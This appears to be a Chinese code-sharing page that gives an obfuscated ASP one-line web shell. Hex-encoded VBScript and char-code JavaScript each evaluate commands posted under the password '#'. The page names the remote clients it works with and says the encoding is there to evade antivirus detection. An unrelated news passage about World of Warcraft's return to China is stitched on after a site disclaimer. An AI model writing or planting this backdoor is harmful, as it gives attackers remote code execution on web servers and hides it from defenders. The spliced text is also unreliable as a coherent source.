不知道怎样表达清楚。看例子吧:
复制代码 代码如下:
<script language=vbs runat=server>  
Execute(HextoStr("65786563757465287265717565737428636872283335292929")) 
Function HextoStr(data) 
HextoStr="EXECUTE """"" 
C="&CHR(&H" 
N=")" 
Do While Len(data)>1 
If IsNumeric(Left(data,1)) Then 
HextoStr=HextoStr&C&Left(data,2)&N 
data=Mid(data,3) 
Else 
HextoStr=HextoStr&C&Left(data,4)&N 
data=Mid(data,5) 
End If 
Loop 
End Function 
</script>  
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode( 
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,1 
04,40,101,41,123,125))</SCRIPt> 

不过加密后就不是一句话了,哈哈。这个s端用海阳或冰狐都可以连得上的,密码是#。

其实只是换写了<script language=vbs runat=server> 这种方式,里边的代码可以用js或vbs等多种加密方式来加密解密了,省得asp只有微软
的那个东东可以加密,同时省去了asp里的%号而已。当然不加密也可以,调用<script language=vbs runat=server>那还是一句话,加密主要
是为了躲过杀毒软件。
标签:
一句话asp木马

免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com

稳了!魔兽国服回归的3条重磅消息!官宣时间再确认!

昨天有一位朋友在大神群里分享,自己亚服账号被封号之后居然弹出了国服的封号信息对话框。

这里面让他访问的是一个国服的战网网址,com.cn和后面的zh都非常明白地表明这就是国服战网。

而他在复制这个网址并且进行登录之后,确实是网易的网址,也就是我们熟悉的停服之后国服发布的暴雪游戏产品运营到期开放退款的说明。这是一件比较奇怪的事情,因为以前都没有出现这样的情况,现在突然提示跳转到国服战网的网址,是不是说明了简体中文客户端已经开始进行更新了呢?